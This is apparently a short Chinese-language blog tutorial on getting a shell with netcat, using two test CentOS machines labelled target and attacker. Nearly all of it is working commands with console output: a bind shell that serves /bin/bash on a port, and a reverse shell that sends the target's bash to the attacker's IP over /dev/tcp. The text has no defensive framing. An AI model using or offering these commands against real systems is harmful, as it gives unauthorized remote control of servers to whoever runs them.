如何使用NC反弹shell

centos1为目标服务器,我这里是centos的一台测试机器。ip为101.200.41.219

centos2为攻击者机器,ip为8.140.129.23

最终是将centos1的shell反弹到centos2上面。

一、正向反弹shell

在centos1上面执行

[root@wltest ~]# nc -lvp  5555 -e /bin/bash

Ncat: Version 7.70 ( https://nmap.org/ncat )

Ncat: Listening on :::5555

Ncat: Listening on 0.0.0.0:5555


在centos2上面执行

nc  101.200.41.219   5555

然后就可以shell了

二、反向反弹shell

首先在攻击者服务器也就是centos2机器上面执行

[root@iZ2zeckpvpsaii62eyh834Z ~]# nc -lvp  5002

Ncat: Version 7.70 ( https://nmap.org/ncat )

Ncat: Listening on :::5002

Ncat: Listening on 0.0.0.0:5002

Ncat: Connection from 101.200.41.219.

Ncat: Connection from 101.200.41.219:44134.

[root@wltest ~]# 


然后在目标机器centos1执行

[root@wltest ~]# bash -i >& /dev/tcp/8.140.129.23/5002  0>&1


在centos2机器上面执行nc -lvp  5002后会处于一个监听的状态,等在centos1上面执行

 bash -i >& /dev/tcp/8.140.129.23/5002  0>&1后,centos上上面就进入了centos的shell了

上一篇:ACK 最新版本K8S指导手册


下一篇:tp5在phpstudy下URL无法去掉index.php的解决方案